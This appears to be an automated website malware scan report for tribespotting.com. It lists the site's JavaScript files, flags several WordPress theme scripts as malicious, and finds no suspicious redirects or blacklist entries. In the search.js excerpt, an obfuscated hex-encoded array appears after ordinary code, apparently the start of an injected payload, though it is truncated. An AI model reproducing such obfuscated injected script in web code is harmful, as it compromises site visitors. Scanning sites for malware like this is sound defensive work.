Scanned pages/files
| Request | Server response | Status |
http://www.tribespotting.com/ | 200 OK Content-Length: 22556 Content-Type: text/html | clean |
http://tribespotting.stefanolevi.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 19615 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 5590 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 8104 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/jquery.cycle.js?ver=4.0 | 200 OK Content-Length: 31068 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var ver="2.72";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).c Antivirus reports:
| ||
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/preloader.js?ver=4.0 | 200 OK Content-Length: 2829 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var imgList = []; $.extend({ preload: function(imgArr, option) { var setting = $.extend({ init: function(loaded, total) {}, loaded: function(img, loaded, total) {}, loaded_all: function(loaded, total) {} }, option); var total = imgArr.length; var loaded = 0; setting.init(0, total); for(var i in imgArr) { imgList.push($("<img />") .attr("src", imgArr[i]) .load(f Antivirus reports:
| ||
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/nav/superfish.js?ver=4.0 | 200 OK Content-Length: 5920 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men Antivirus reports:
| ||
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/nav/supersubs.js?ver=4.0 | 200 OK Content-Length: 5504 Content-Type: application/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/search.js?ver=4.0 | 200 OK Content-Length: 2980 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function clearInput(field_id, term_to_clear) { if (document.getElementById(field_id).value == term_to_clear ) { document.getElementById(field_id).value = ''; } else if (document.getElementById(field_id).value == '' ) { document.getElementById(field_id).value = term_to_clear; } } var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2 Antivirus reports:
| ||
http://tribespotting.stefanolevi.com/wp-content/themes/photo-workshop/includes/js/jquery.custom.js?ver=4.0 | 200 OK Content-Length: 3391 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function(){ jQuery(".pad img").hover(function(){ jQuery(this).fadeTo("slow", 0.6); },function(){ jQuery(this).fadeTo("slow", 1.0); }); jQuery.fn.slideFadeToggle = function(speed, easing, callback) { return this.animate({opacity: 'toggle', height: 'toggle'}, speed, easing, callback); }; jQuery('#show_captions').click( function() { jQuery(".caption").each(function (i) { if (this.style.display == "none") Antivirus reports:
| ||
http://tribespotting.stefanolevi.com/wp-includes/js/swfobject.js?ver=2.2-20120417 | 200 OK Content-Length: 10231 Content-Type: application/javascript | clean |
http://app.icontact.com/icp/loadsignup.php/form.js?c=974419&l=46978&f=9174 | 200 OK Content-Length: 2702 Content-Type: text/javascript | clean |
http://tribespotting.stefanolevi.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tribespotting.com
Result:
GET / HTTP/1.1
Host: tribespotting.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tribespotting.com
Referer: http://www.google.com/search?q=tribespotting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tribespotting.com
Referer: http://www.google.com/search?q=tribespotting.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tribespotting.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tribespotting.com/
Result: tribespotting.com is not infected or malware details are not published yet.
Result: tribespotting.com is not infected or malware details are not published yet.